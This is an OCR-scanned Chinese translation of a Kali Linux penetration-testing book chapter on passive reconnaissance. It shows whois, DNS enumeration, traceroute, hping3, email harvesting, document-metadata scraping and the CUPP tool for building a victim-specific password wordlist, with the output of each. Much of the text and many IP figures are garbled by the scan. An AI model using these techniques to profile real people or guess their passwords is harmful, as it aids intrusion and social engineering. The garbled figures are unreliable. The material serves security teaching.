:支持 基于 查询 中 指定 的 位 置 或 者 人 员 的 社交 网 络 攻击 。 
:识别 物理 攻击 的 位 置 。 
:识别 用 于 war qialing 攻 击 ， 或 者 社交 工程 攻击 的 电话 号 码 。 


例如 目标 或 者 由 同一 个 用 户 操作 的 服务 硕 ， 如 宁 他 们 是 不 安全 的 ， 攻 击 者 可 以 利用 他 
们 得 到 服务 器 过 理 员 的 权限 ， 然 后 攻 殉 目标 服务 天 


在 域 到 期 的 情况 下 ， 攻 击 者 可 以 试图 改变 域 的 大 小 ， 并 创建 一 个 外 观 相 似 的 网 站 来 危害 访问 者 ， 这 些 访问 者 以 为 他 们 访问 的 是 原来 的 网 站 。 
攻击 者 将 用 权威 的 DNS 服务 器 来 帮助 DNS 勘测 ， 权 威 服务 器 有 需要 奉 找 的 那个 域 的 记录 。 


注意 ， 越 来 越 多 的 实体 使 用 第 三 方 来 保护 数据 ， 有 一 些 域 ， 例 如 .gov 和 .mil 可 能 不 会 被 公共 域 访 问 。 友 给 这 些 域 的 请 求 会 被 
记 入 日 志 。 几 个 在 线 列 表 ， 有 效 地 描述 了 指定 给 政府 使 用 的 域 IP 地 址 ; 大 多 数 工 具 都 有 “不 联系 ”地 址 选项 ， 且 应 该 将 政府 域 输 
入 这 些 字段 ， 来 避免 错误 的 天 注 类 型 。 


使 用 一 个 whois 查 询 语句 ， 最 简单 的 方式 是 使 用 命令 行 。 如 图 2.2 所 示 ， 该 图 显示 了 使 用 whois 命 令 获取 数字 国防 (Digital 
Defence) 的 域 的 相关 信息 : 


root@kali:~# whois digitaldefence.ca 


Domain name: digitaldefence.ca 
Domain status: registered 
Creation date: 2002/06/10 
Expiry date: 2015/06/10 
Updated date: 2011/05/31 
Registrar: 
Name: Tucows.com Co. 
Number: 156 


Registrant: 
Name: DigitalDefence, Inc 


Administrative contact: 
Name: Robert W. Beggs 
Postal address: 302-3310 South Service Road 
Burlington ON L7N 3M6 Canada 


Phone: 905-681-3316 
Fax: 416-644-8801 
Email: robert.begasadigitaldefence.ca 


Technical contact: 
Name: Robert W. Beggs 
Postal adaress: 307-3310 South Service Road 
Burlington ON L/N 3M6 Canada 


Phone: 905-681-3310 
Fax: 416-644-8801 
Email: robert.begasüadigitaldefence.ca 


Name servers: 
ns8O3.businesscatalyst.com 
nsÓl.businesscatalyst.com 


A2.2 ”使 用 whois 命 令 获取 数字 国防 的 域 的 相关 信息 
返回 的 whois 记 录 包 含 地 理 信 息 、 名 字 和 联系 信息 一 所 有 会 导致 社 父 工程 攻击 的 信息 。 


有 几 个 上 自动 查找 询问 whois 的 网 站 ， 攻 击 者 可 以 利用 这 样 站 点 ， 在 目标 和 他 们 之 间 插 入 一 个 步骤 ; 然而 ， 执 行 查找 的 站 点 可 
能 会 记录 查询 者 的 IP 地 址 。 


2.3.2 DNS 侦察 


域名 系统 (Domain Name System, DNS) 是 一 个 分 布 式 的 数据 库 ， 将 域名 (www.digitaldefence.ca) 转换 为 它 的 IP 地 
HE (192.150.2.140) 。 


攻击 者 通过 下 面 的 方式 利用 DNS 信息 : 


使 用 蛋 力 攻击 ， 人 允许 攻击 者 识别 与 日 标 相关 的 新 域名 。 

如 果 DNS 服 务 嚣 被 配置 成 允许 一 个 区 域 传递 给 任何 公 询 者 ，DNS 服 务 占 会 提供 可 访问 的 互联 网 系统 的 主机 名 和 IP 地 址 ， 使 其 更 容易 地 识别 潜 
在 的 目标 。 如 采 目 标 没 有 把 公共 的 《外 部 的 ) 与 个 人 的 《内 部 的 ) DNS 信息 隔离 开 来 ， 区 域 转换 可 能 会 泄漏 内 部 设备 的 主机 名 和 IF 地 址 。“〈 注 
意 ， 如 末 区 域 转换 请 求 被 触发 ， 大 多 数 IDS 和 IPS 系 统 将 会 发 出 党 告 。) 

寻找 易 受 攻击 的 服务 (例如 FTP 服 务 ) ， 或 者 男 外 的 有 趣 的 服务 远程 管理 面板 和 远程 访问 〉。 

寻找 配置 错误 或 者 未 打 补 丁 的 服务 器 (dbase.test.target.com) . 

服务 记录 (Service records, SRV) 提供 了 服务 、 传 输 、 正 口 和 服务 的 重要 命令 的 相关 信息 。 这 可 能 会 帮助 攻击 者 推 关 出 软件 。 


:关键 域 识 别 邮 件 (DomainKeys Identified Mail, DKIM) MRX ARIKE (Sender Policy Framework, SPF) 记录 用 于 控制 垃圾 
邮件 。 如 果 这 些 记录 被 识别 ， 攻 击 者 可 以 知道 : 


他 们 比 大 多 数组 织 有 更 强 的 安全 意识 。 
可 能 会 影响 网 络 钓鱼 和 其 他 社交 工程 攻击 。 


Windows 和 UNIX 都 支持 基础 的 命令 行 工具 ， 例 如 nslookup; 而 且 UNIX 系 统 支 持 附加 的 命令 行 选项 ， 例 如 dig。 不 扩 的 


是 ， 这 些 命令 通 单一 次 询问 一 个 服务 器 ， 需 要 有 效 的 交互 式 啊 应 。 


H 


对 于 一 个 特定 的 目标 ，Kali 有 几 个 能 反复 查询 DNS 信息 的 特色 工具 。 选 择 的 工具 必须 适应 互联 网 协议 版 本 (1Pv4 或 者 
IPv6) ， 互 联网 协议 用 于 与 目标 进行 通信 。 


IPvA 


IP 或 者 因特网 协议 地 址 ， 是 识别 连接 到 一 个 私有 了 网 或 者 公共 网 的 设备 的 唯一 号 码 。 今 天 ， 因 特 网 大 部 分 是 基于 IPv4 的 。Kali 
包括 几 个 工具 用 来 帮助 DNS 侦察 ， 如 表 2.1 所 示 。 


表 2.1 Kali 侦 察 DNS 的 几 个 工具 


a PTT 

这 些 是 综合 的 DNS 扫描 器 一 -DNS 记录 详细 目录 (A, MX, TXT, SOA, 
通配符 等 )、 子 区 域 暴 力 攻 击 、 谷 歌 查找 、 反 向 查找 、 区 域 转换 以 及 区 域 移动 
dsnrecon 通常 是 第 一 选择 一 一 它 是 非常 可 靠 的 ， 结 果 也 很 容易 理解 ， 数 据 可 以 直 
pz A PI | i, Metasploit HE4 

决定 了 从 哪里 得 到 一 个 给 定 的 域名 系统 DNS 的 信息 ， 并 随 着 DNS 服务 器 ， 回 
到 拥有 效 据 的 服务 益 
dnswalk DNS 调试 器 ， 为 规定 的 域 检查 其 内 部 的 稳定 性 和 准确 性 

针对 规定 的 域 ,试看 通过 区 域 转换 和 蛋 力 攻击 得 到 DNS 信息 ， 和 定位 非 连续 的 
IP 空间 和 主机 名 


dnsrnum 、dnsmap 和 dnsrecon 


dnstracer 


tierce 
测试 期 间 ， 大 多 数 调 查 者 运行 fierce 来 确认 所 有 可 能 已 经 识别 的 目标 ， 然 后 运行 至 少 两 个 综合 性 的 工具 (例如 ，dnsenum 
和 dnsrecon) 来 产生 最 多 的 数据 ， 并 提供 一 个 交叉 确认 等 级 。 


在 图 2.3 中 ， 使 用 dnsrecon 产 生 一 个 标准 的 DNS 记录 搜索 ， 并 且 这 个 搜索 对 于 SRV 记 录 是 明确 的 (特定 的 ) 。 在 每 个 例子 期 
望 的 结果 见 图 2.3。 


rootükali:-4 dnsrecon -t std -d google.com 

[*] Performing General Enumeration of Domain: 

[-] DNSSEC is not configured for google.com 

[*] SOA nsl.google.com 216.239.32.10 

[*] NS ns3.google.com 216.238.36.10 

Er] NS ns2.google.com 216.239.34.10 

[*] NS ns4.google.com 216.239.38.10 

bag NS nsl.google.com 216.239.32.10 

p^ MX alt2.aspmx.l.google.com /4.125.131.2/ 

[*] MX altl.aspmx.l.google.com 173.194.76.27 

bal MX alt3.aspmx.l.google.com 173.194.66.27 

d MX alt4.aspmx.l.google.com /4.125.136.26 

[*] MX aspmx.l.google.com 74.125.142.27 

[*] MX alt2.aspmx.l.google.com 2607 :f8b0:400c :c81::1a 
[*] MX altl.aspmx.l.google.com 250/:f8b0:400d:c02::1b 
L* | MX alt3.aspmx.l.google.com 2a00:1450:400c:cO0::la 
E 

E] 

E] 

L^] 

[*] 

[*] 

E] 

L^] 

[*] 

Bg 

ia 

[*] 

[*] 
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+ 


* 


t 
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T 
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3 MX alt4.aspmx.l.google.com 2a00:1458:4013:c00::1a 
MX aspmx.l.google.com 260/:f8b0:400d:c02::1a 
google.com 1/3.194.43.72 

google.com 173.194.43.64 

google.com 1/3.194.43.66 

google.com 173.194.43.70 

google.com 1/3.184.43.78 

google.com 173.194.43.67 

google.com 173.194.43.68 

google.com 173.194.43.71 

google.com 173.194.43.73 

google.com 1/3.194.43.69 

google.com 1/3.194.43.65 

AAAA google. com | 2607: BE 490b : 806: :1009 


3 


+ 


4 


+ 


中 


* 


图 2.3 ”使 用 dnsrecon 搜 索 域名 相关 信息 的 截图 


DNSrecon 人 允许 渗透 测试 员 获 得 SOA 记 录 ， 名 称 服务 器 (name sever, NS) ， 邮 件 交 换 主 机 (mail exchanger, MX) , 
使 用 发 送 者 策略 框架 (Sender Policy Framework, SPF) 友 送 电子 邮件 的 服务 器 ， 以 及 使 用 的 IP 地 址 汽 围 。 


IPv6 


虽然 IPv4 似 乎 允许 一 个 很 大 的 地 址 空间 ， 但 是 ， 大 量 可 用 的 IP 地 址 在 几 年 前 就 已 经 耗 尽 ， 在 这 种 情况 下 ， 需 使 用 NAT 技 术 和 
DHCP 技 术 来 提供 可 用 地 址 的 数量 。 一 个 更 持久 的 解决 方法 已 经 找到 ， 米 用 一 个 改进 的 IP 地 址 方案 IPv6。 虽 然 小 于 5% 的 因特网 
在 使 用 IPv6 地 址 ， 但 它 的 使 用 率 的 确 在 增长 ， 并 且 渗 透 测试 员 必 须 处 理 IPv4 和 IPv6 之 间 的 不 同 。 


在 |Pv6 中 ， 源 地 址 和 目的 地 址 的 长 度 是 128 位 ， 可 扩展 为 21<8 个 可 能 的 地 址 ， 也 就 是 有 3.4x 1038 个 地 址 。 


随 着 可 寻 址 地 址 空间 大 小 的 增加 ， 地 址 空间 对 渗透 测试 员 也 呈现 了 一 些 问 题 ， 尤 其 是 使 用 扫 摘 器 在 可 用 地 址 空间 中 寻找 人 在线 
服务 器 的 时 候 。 然 而 一 些 IPv6 协 议 的 特征 已 经 简化 了 测试 过 程 ， 尤 其 是 使 用 ICMPvV6 确 定 活跃 的 本 地 链 路 地 址 。 


针对 如 下 情况 ， 执 行 初始 浏览 时 考虑 IPv6 是 很 重要 的 : 


测试 工具 对 IPv6 功 能 的 文 持 是 不 均 义 的， 所 以 测试 员 必 须 确定 每 一 个 工具 在 IPv4、IPv6、 混 合 网 络 中 的 性 能 和 准确 性 。 
:由 于 IPv6 是 一 个 相当 新 的 协议 ， 目 标 网 络 可 能 包含 泄漏 重要 数据 的 错误 配置 ， 测试 员 必须 识别 并 利用 这 个 信息 。 


:早先 的 网 络 协议 防火墙 、IDS 和 IPS》〉 可 能 不 会 测 出 IPv6。 在 这 些 情况 下 ， 渗 透 测试 员 可 以 利用 IPv6 信 道 保 持 与 网 络 的 隐 釉 通信 ， 并 泄漏 
LH AS tar al FI HI E 


Kali 包 含 几 个 利用 IPv6 的 工具 (大 多 数 综合 的 扫描 器 例如 nmap 现 在 也 支持 IPv6) ， 见 表 2.2， 绝 大 部 分 支持 IPv6 的 工具 源 自 
THC-IPv6 攻 击 包 。 


表 2.2 Kali 包含 的 支持 IPv6 的 工具 
命令 说 阴 
使 用 基于 具备 字 由 文件 或 者 
' BH c R|BSURE 9] 91 3e frg gs 77 48 
索 来 列举 二 级 域名 ， 从 而 获得 
已 存在 的 JPv4 Kl IPv6 地 址 
Zr 4] E —€ T IPv6 地 lik. JA 4 T Fz 
DNS #45 


dnsdict6 


dnsrevenum6 


运行 dnsdict6 命 令 ， 如 图 2.4 所 示 。 


# dnsdict6 google.com 
Starting DNS enumeration work on google.com. 
Starting enumerating google.com. - creating 8 threads for /98 words... 
Estimated time to completion: 1 to 2 minutes 
www.google.com. => 2607:f8b0:400b:807 : :1012 
ipv6.google.com. => 2607:f8b0:400b:80b::1012 
mail.google.com. => 2607:f8b0:400b:806::1016 
blog.google.com. => 260/:f8b0:4001 :cO0 : :bf 


图 2.4 使 用 dnsdict6 命 令 
2.3.3 ”映射 路 由 到 目标 
路 由 映射 最 开始 是 一 个 路 线 诊断 工具 ， 用 于 查看 1P 数 据 包 从 一 个 主机 到 另 一 个 主机 的 路 线 连 接 。 通 过 使 用 IP 数 据 包 中 的 存活 


时 间 TTL (time to live) 变量 ,每 个 hop 在 从 一 后 到 下 一 点 时 ， 从 接收 路 由 器 引出 一 个 ICMP TIME_EXCEEDED 消 息 ， 同 时 TTL 
字段 的 值 减 1。 数 据 包 计算 hop 以 及 使 用 的 路 由 器 的 数量 。 


从 攻击 者 或 者 渗透 测试 员 的 角度 看 ，traceroute 数 据 有 以 下 重要 数据 : 


:攻击 者 与 目标 之 间 的 准确 路 径 。 

关于 网 络 外 部 拓扑 结构 的 提示 。 

-确定 可 能 过 滤 攻 击 流 的 访问 控制 设备 (防火墙 和 包 过 小 路 由 器 〉。 
-如 果 网 络 配置 错误 ， 可 能 会 识别 内 部 地 址 。 


era Æ fF Web traceroute (www.traceroute.org) ， 可 以 奶 查 到 目标 网 络 不 同 地 理 位 置 的 源 地 址 。 这 些 形式 的 扫 摘 ， 可 以 定期 地 识 
别 不 止 一 个 连接 目标 的 不 同 网 络 ， 在 一 个 接近 目标 网 络 的 位 置 ， 通 过 执行 单个 的 traceroute， 可 能 忽略 挥 一 些 扫描 识别 信息 。 基 于 Web 的 
ui ee ee ee eee 
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人 在 Kali 系 统 中 ，traceroute 是 一 个 命令 行程 序 ， 利 用 ICMP 包 来 映射 路 由 ; 在 Windows 系 统 中 ， 访 程序 是 tracert。 


如 果 你 在 Kali 中 局 动 traceroute， 你 可 能 看 到 大 多 数 hops 过 滤器 (用 ** 表 示 数 据 ) 。 例 如 ， 从 作者 现在 的 位 置 


到 www.google.com， 执 行 traceroute 命 令 的 结果 ， 如 图 2.5 所 示 。 


i= j 
E 


ükali:-4 traceroute www.google.com 


TOO 


traceroute to www.google.com (24.226.16.35), 30 hops max, 60 byte packets 
1 192.168.117.2 {192.168.117.2) 0.179 ms 0.107 ms 0.099 ms 

J k*k 

3 1 k y 

4 Wi å KK 


图 2.5 ”在 Kali 中 使 用 ttacetoute 命 令 


然而 ， 在 Windows 环 境 中 ， 如 果 用 tracert 执 行 相同 的 请 求 ， 我 们 可 以 看 到 如 图 2.6 所 示 的 信息 。 


Ci\>tracert 24.226.16.35 


Tracing route to cache.googlevideo.com [24.226.16.35] 
over a maximum of 38 hops: 


1 1 ms <1 ms <i ms 192.168.1.1 
2 13 ms 7 ms 1 ms s?2-36-69-141.static.comm.cgocable.net [72.38.67 
.141 ] 


3 21 ms 31 ms 29 ms 1H.64.232.1 

4 164 ms 159 ms 2180 ms  d226-8-1?7.home.cqocable.net [(24.226.8.1971 

5 95 ms 98 ms 95 ms cgowave-busy3-ubr.cgocable.net [24.226.6.133] 
6 12 ms 12 ms 14 ms cache.googlevideo.com [24.2265.16.35 


Trace complete. 


图 2.6 Kali P f£ H tracert A 


我 们 不 仪 能 得 到 完整 的 路 径 ， 而 且 还 能 看 到 www.google.com 正 被 解析 为 一 个 略 有 不 同 的 I|P 地 址 ， 这 表明 负载 均衡 器 是 起 
作用 的 (你 可 以 使 用 Kali 的 lbd 脚 本 来 确认 其 是 否 起 作用 ， 当 然 ， 访 活动 可 能 被 目标 位 置 记录 ) 。 


默认 情况 下 ， 这 是 不 同 路 径 存在 的 原因 ， 在 Kali 环 境 中 ，traceroute 用 于 UDP 数 据 报 ， 而 在 Windows 环 境 中 ，tracert 使 用 
ICMP 返 回 请 求 (ICMP type 8) 。 因 此 ， 当 使 用 Kali 工 具 完 成 一 个 traceroute 时 ， 为 了 获得 最 完整 的 路 径 并 绕 过 数据 报 过 滤 设 
备 ， 使 用 多 重 协 议 是 很 重要 的 。 


Kali 提 供 下 列 工具 来 完成 路 由 追踪 ， 见 表 2.3。 


表 2.3 ”Kali 提供 的 路 由 扫描 工具 


命令 说 明 
这 是 一 个 TCP/AE WALI eS A ree. EES TCP, UDP, ICMP 以 及 raw-IP， 并 使 用 一 个 


ape 类 位 ping 的 接口 界面 

(— 通过 利用 现 有 的 TCP 连接 ， 包 括 从 本 地 系统 或 者 网 络 ， 以 及 本 地 主机 局 z) ; 该 程序 使 用 户 能 计算 
IP hop 数 。 这 对 绕 过 外 部 过 滤 帮 (如 防火 墙 ) 是 很 有 用 的 。intrace 用 来 代替 无 可 信和 保障 的 0trace 程序 

traceó 这 十 一 个 使 用 ICMP6 的 traceroute 程序 


由 于 对 数据 包 类 型 、 源 数据 包 ， 以 及 目的 数据 包 的 控制 ，hping3 已 成 为 最 有 用 的 工具 之 一 。 例 如 ，Google 不 允许 ping 请 
求 。 然 而 ， 如 果 将 发 送 数 据 包 作为 一 个 TCP SYN 请 求 ， 则 有 可 能 ping 通 服务 器 。 


在 下 面 的 例子 中 ， 测 试 员 试 图 在 命令 行 中 ping 通 谷歌 。 返 回 的 数据 确定 了 www.google.com 是 一 个 未 知 的 主机 ; 谷歌 很 明 
显 阻 塞 了 基于 ICMP 的 ping 命 令 。 然 而 ， 下 一 条 命令 调用 了 hping3， 命 令 它 做 以 下 事情 : 


1. 使 用 有 SYN 标 识 集 (-s) 的 TCP 向 谷歌 发 送 一 个 类 ping 命 令 。 

2. 把 数据 包 直 接 发 送 到 80 端 口 ， 该 类 型 的 合法 请 求 是 很 少 阻塞 的 (-p 80) 。 
3. 为 皮 送 给 目标 的 三 个 数据 包 设置 计数 (-c 3) 。 

执行 上 面 的 步骤 所 使 用 的 命令 行 ， 如 图 2.7 所 示 。 


root@kali:~# ping www.google.com 

ping: unknown host www.google.com 

rootükali:-4 hping3 -S www.google.com -p 80 -c 3 

HPING www.google.com (ethO /4.125.225.112): S set, 40 headers + © data bytes 
len-46 ip=/4.125.225.112 ttl-56 id-10463 sport=80 flags=SA seq=0 win-42900 rtt-2| 
81.0 ms | 
Len=46 ip=74.125.225.112 ttl=56 id=44734 sport-80 flags-SA seg-1 win-42900 rtt=8 
4.0 ms 

len-246 ip=/4.125.225.112 ttl=56 id=26344 sport=80 flags=SA seq-2 win-42900 rtt=2 
6.3 ms 


--- www.google.com hping statistic --- 

3 packets transmitted, 3 packets received, 0% packet Loss 
round-trip min/avg/max = 26.3/130.5/281.0 ms 

root@kali:-# _ 


图 2.7 在 Kali 中 使 用 ping 命 令 和 hping3 命 令 


hping3 命 令 成 功 地 确定 了 在 线 目标 ， 并 提供 了 基本 的 路 由 信息 。 
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许多 渗透 测试 员 收 集 用 户 名 和 电子 邮件 地 址 ， 因 为 这 些 信息 经 常用 于 登录 目标 系统 。 
最 党 用 的 工具 是 网 页 浏 吃 器 ， 用 来 手动 搜索 目标 组 织 的 网 站 ， 也 包括 第 三 方 站 操 ， 例 如 LinkedIn 或 Jigsaw。 


Kali 包 含 的 一 些 上 自动 工具 可 以 支持 手动 搜索 。 


忆 攻 前 雇员 的 电子 邮件 地 址 仍然 可 以 使 用 。 在 实行 社交 工程 攻击 时 ， 对 一 个 从 前 雇员 来 的 直接 信息 请 求 ， 通 常 时 致 一 个 对 攻击 者 的 重 定向 ， 


ee ms 可 能 被 当 作 前 雇员 对 待 。 此 外 ， 许 多 机 构 不 能 正确 地 终止 员工 账号 ， 这 些 证 书 有 可 能 仍 会 给 予 访问 目标 系统 的 权 


2.4.1 ”收集 姓名 和 电子 邮件 地 址 


theharvester 工 具 是 一 个 Python 脚 本， 该 脚本 借助 流行 的 搜索 引擎 和 其 他 一 些 站 点 来 进行 搜索 ， 如 电子 邮件 地 址 、 主 机 以 
及 子 域 站 点 等 。 


使 用 theharvester 工 具 是 相当 简单 的 ， 只 需 通过 几 个 命令 参数 来 进行 设置 。 可 用 的 选项 如 下 : 


d: 用 来 确定 搜索 的 域 ， 即 一 般 的 域 或 者 目标 网 站 。 
b: 用 来 确定 提取 信息 的 来 源 ， 来 源 必须 是 下 面 的 一 种 : 


Bing, BingAPI, Google, Google-Profiles, Jigsaw, LinkedIn, People123, PGP, 或 者 以 上 的 全 部 。 


-1: 该 选项 使 Lhenarvester 只 收集 来 自 特 定数 目的 返回 搜索 结果 的 数据 。 
f: 用 来 保存 最 后 结果 ， 保 存 为 HTML 文 件 或 者 XML 文 件 。 如 果 省 略 该 选项 ， 结 果 将 会 显示 在 屏幕 上 ， 但 是 不 会 被 保存 。 


图 2.8 说 明了 对 digitaldefence.ca 域 的 一 个 简单 谷歌 索引 搜索 。 
rootükali:-4X theharvester -d digitaldefence.ca -b google 


» sk kc pe ope oxe oe ode ope o e oe oe oi oe oe oe ok og oie ik ox ke oe o ok oe ok oxe oic oe ok oe oe e ok oie ox ok oe o ote i oe ok oe oe ok oe oe oxe oe oe oe ke oe oie oic oke oe o oe oi ok ic oie ok ok 
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"| 15. zw ow du X. | : 2 É OW |. 24. X c [ 4 
dE EMEN LS Kt ]l XX Wec | git | ' 
= Add AAI M SML Aadel Vu x dL Sy NX II i 
+ + 
* [heHarvester Ver. 2.28 5 
* Coded by Christian Martorella * 
* Edge-Security Research t 

xi 


* cmartorella@edge-security.com 
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[-] Searching in Google: 
Searching O results... 
Searching 100 results... 


[+] Emails found: 
robert.beggsadigitaldefence.ca 
careers(üdigitaldefence.ca 
csirt@digitaldefence.ca 
partnersüdigitaldefence.ca 
infoüdigitaldefence.ca 


[+] Hosts found in search engines: 


54.236.1980.114:www.digitaldefence.ca 


图 2.8 ”用 谷歌 搜索 digitaldefence.ca 域 


242 ”收集 文件 元 数据 


文件 元 数据 是 附加 在 文件 上 的 一 些 信 息 ， 这 些 信息 应 用 在 创建 和 存储 时 ， 利 用 这 些 信息 能 管理 文件 。 附 加 在 文件 上 的 有 代表 
性 的 元 数据 如 下 : 


创建 文件 应 用 的 公司 或 者 个 人 。 

文件 作者 的 名 字 。 

创建 文件 的 时 间 及 日 期 。 

文件 最 近 的 打印 或 者 修改 的 时 间 ; 在 一 些 实例 中 ， 时 间 可 以 确定 是 谁 做 了 这 些 修改 。 

创建 文件 的 计算 机 网 络 位 置 。 

-有 一 些 文件 ， 尤 其 是 那些 由 相机 或 者 移动 设备 创建 的 文件 ， 可 能 包含 地 理 的 标记 ， 该 标记 可 以 确定 图 片 是 在 哪里 创建 的 。 


元 数据 对 最 终 用 户 不 是 直接 可 见 的 ， 所 以 大 多 数 文件 和 元 数据 一 起 整体 公布 。 不 六 的 是 ， 这 种 数据 会 港 漏 一 些 信息 ， 而 这 些 
言 息 会 被 测试 员 或 者 攻击 者 在 进行 攻击 时 利用 。 人 至 少 ， 测 试 员 和 攻击 者 可 以 通过 比较 它们 和 文件 里 的 元 数据 来 得 到 用 户 名 ; 它们 
可 以 确定 人 们 和 特定 文件 类 型 的 联系 ， 例 如 年 度 财政 报告 或 者 战略 计划 。 


随 着 移动 设备 的 普及 ， 与 地 理 有 关 的 元 数据 相关 的 风险 也 提高 了 。 攻 击 者 寻找 一 些 位 置 (如 别墅 、 酒 店 以 及 经 党 去 的 和 餐厅) 
作为 友 起 攻击 的 站 后， 这 类 攻击 针对 那些 在 公共 场所 降低 了 安全 保护 的 用 性。 例如 ， 如 果 目 标 机 构 的 一 个 员工 经 常 在 等 待 上 班车 
辆 时 发 庆 图 片 到 社交 媒体 网 站 上 ， 攻 击 者 可 以 向 这 个 员工 发 起 物理 攻击 (窃取 移动 设备 ) 、 无 线 攻 击 ， 甚 至 偷 看 并 记录 其 用 户 名 
和 密码 。 


在 Kali 系 统 中 ，Metagoofil 工 具 通 过 执行 谷歌 搜索 来 确定 并 下 载 目标 网 站 的 文件 (包括 : .doc、.docx、.pdf、.ppts、.xls 
和 .xlsx) 并 提取 用 户 名 、 软 件 版 本 、 存 储 路 径 名 ， 以 及 服务 器 或 工作 站 名 ， 如 图 2.9 所 示 。 


rootükali:-4 metagoofil -d microsoft.com -t doc -L 25 -o microsoft -f microsoft. 


Html 
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['doc | 
[-] Starting online search... 


[-] Searching for doc files, with a limit of 25 
searching 100 results... 

Results: 102 files found 

starting to download 50 of them: 


[1/50] /webhp?hlzen 

[x] Error downloading /webhp?hl=en 
[2/50] http://download.microsoft.com/documents/customerevidence/9930 Planet Pret 
_Frees Sandwich Chain fr.doc 


图 2.9 ”Metagoofil 工 具 通 过 谷歌 搜索 来 确定 并 下 载 文 件 
Metagoofi 下 载 了 指定 数目 的 文件 存储 在 一 个 临时 文件 夹 内 ， 并 提取 整理 相关 的 元 数据 。 该 工具 也 通过 该 项 功能 来 处 理 先 
前 下 载 过 的 ， 且 已 存储 在 本 地 的 文件 。 


Metagoofil 首 次 返回 的 是 查找 到 的 用 尸 列表 。 图 2.10 是 一 个 短 的 列表 。 


[+] List of users found: 


Michael Grimm, Microsoft Corp. 
Il Pro Marketing 

May Yee 

sarah condon 

Michael Royster 


图 2.10 ”Metagoofil 返 回 的 用 户 列 表 


Metagoofil 也 确定 了 服务 器 和 文件 的 路 径 名 。 如 果 一 些 目标 文件 局 限于 一 个 特定 的 用 户 内 (例如 ， 在 行政 助理 的 工作 间 找 
到 的 财政 报告 草稿 ， 这 样 的 用 户 可 能 在 后 面 测 试 时 将 其 作为 目标 。 如 图 2.11 所 示 。 


[+] List of paths and servers found: 

Normal 

documentbase 

ASML .dot 

CEP Template 

CEP Template.dot 

Normal .dot 

‘Ci\Mis documentos\Articulo Gestion.doc' 

'C:\WINDOWS\ TEMP\AUtoRecovery save of Articulo Gestion.asd' 


图 2.11 服务 器 与 路 径 列 表 


2.5 STRAP ERO 


迄今 为 止 ， 你 已 经 学 会 了 使 用 被 动 侦 测 来 收集 目标 机 构 的 用 尸 名 和 生物 信息 ; 攻击 者 也 可 以 做 到 这 些 。 下 一 步 融 是 使 用 这 些 
言 恩 来 创建 用 户 和 目标 的 密码 询 表 。 


可 以 下 载 常 用 的 密码 列表 ， 并 存储 在 Kali 系 统 中 的 /usr/share/wordlists 目 录 中 。 这 些 列表 反映 了 很 多 用 户 的 爱好 ， 应 用 程 
序 定期 消耗 列表 中 的 密码 ， 这 样 在 转换 到 队列 的 下 一 个 密码 之 前 ， 会 用 到 每 一 个 可 能 的 密码 。 


幸运 的 是 ， 通 用 用 户 密码 分 析 器 (Common User Password Profiler, CUPP) 可 以 让 测试 员 针 对 特定 的 用 户 生 成 其 对 应 
的 特殊 wordlist 文 件 。CUPP 在 Backtrack 5r3 被 提出 。 然 而 在 Kali 中 必须 下 载 后 才 可 使 用 。 为 了 获得 CUPP， 可 输入 以 下 命令 : 


git clone https://github.com/Mebus/cupp.git 


这 将 会 把 CUPP 下 载 在 本 地 目录 中 。 


CUPP 是 一 个 Python 脚 本 ， 通 过 以 下 命令 ,可 以 在 CUPP 目 录 中 简 早 地 调用 : 
root@kali:~# python cupp.py -i 


以 交互 的 方式 局 动 CUPP， 这 种 交互 方式 可 以 提示 用 户 利 用 指定 的 信息 元 素来 创建 wordlist 文 件 。 简 单 的 例子 如 图 2.12 所 


e | 
^ 
o 


在 交互 模式 创建 完 wordlist 后 ， 将 其 放 在 CUPP 目 录 中 。 


root@kali:~/Desktop/cupp# python cupp.py =T 


[+] Insert the informations about the victim to make a dictionary 
[+] If you don't know all the info, just hit enter when asked! ;) 


Name: Robb 

surname: Beggs 

Nickname: rwbeggs 

Birthdate (DDMMYYYY): 01011900 


V VV V 


> Wife's(husband's) name: Vixen 
> Wife's(husband's) nickname: Vix 
> Wife's(husband's) birthdate (DDMMYYYY): 8382021902 


> Child's name: Demon 
» Child's nickname: Demon 
> Child's birthdate (DDMMYYYY): 03031920 


> Pet's name: Spot 
> Company name: Packt 


Do you want to add some key words about the victim? Y/[N]: 

Do you want to add special chars at the end of words? Y/[N]: 

Do you want to add some random numbers at the end of words? Y/[N] 
Leet mode? (i.e. leet = 1337) Y/[N]: 


VV WMV 


[+] Now making a dictionary... 

[+] Sorting list and removing duplicates... 

[+] Saving dictionary to robb.txt, counting 1157 words. 

[+] Now Load your pistolero with robb.txt and shoot! Good Luck! 


图 2.12 4 JE CUPP&] wordlist 


2.6 ”小结 


在 攻击 过 程 或 者 杀 链 中 的 第 一 个 实际 步骤 是 进行 探测 来 确定 攻击 目标 和 潜在 的 攻击 路 由 。 被 动 探测 访问 公共 数据 。 这 是 一 个 
秘密 进行 的 过 程 ， 攻 击 者 的 IP 地 址 与 活动 不 与 正常 访问 区 别 开 。 然 而 ， 这 些 信息 在 进行 社交 网 络 攻 击 时 起 着 决定 性 作用 ， 它 对 其 
他 类 型 的 攻击 也 有 着 促进 作用 。 


在 下 一 章 中 ， 我 们 将 会 测试 更 主动 的 探测 类 型 。 这 些 技术 会 产生 更 多 的 信息 ， 探 测 的 风险 也 在 增 大 ， 我 们 将 重点 放 在 更 先进 
的 隐形 技术 上 。 


a3 3 主动 侦察 和 漏洞 m HB 


侦察 阶段 是 为 了 尽 可 能 多 地 收集 与 目标 有 关 的 信息 ， 这 些 信息 用 来 帮助 杀 链 的 攻击 实施 。 


我 们 已 经 知道 ， 几 乎 检测 不 到 的 被 动 侦察 ， 可 以 产生 大 量 天 于 目标 组 织 及 其 用 户 的 信息 。 


主动 侦察 是 建立 在 开源 的 成 果 和 被 动 侦察 之 上 ， 并 侧重 于 使 用 探测 来 确定 到 达 目 标的 路 径 ， 
surface) 。 在 一 般 情况 下 ， 复 杂 的 系统 有 更 大 的 攻击 面 ， 并 且 每 个 面 都 可 锐利 用 和 再 利用 ， 以 支持 其 他 的 攻击 。 


虽然 主动 侦察 会 产生 更 多 的 信息 、 更 有 用 的 信息 ， 但 是 


墙 、 入 侵 检 测 系统 等 保护 设施 触 友 报警 。 当 对 攻击 者 有 用 的 数据 增加 时 ， 被 检测 到 的 风险 同样 增加 ， 如 图 3.1 所 示 。 
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旦 是 ， 由 于 与 目标 系统 的 相互 作用 ， 可 能 会 被 记录 ， 并 且 可 能 会 通过 防火 


暴露 目标 的 攻击 面 (attack 
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位 JV ALS 
图 3.1 攻击 数据 与 风险 关系 图 


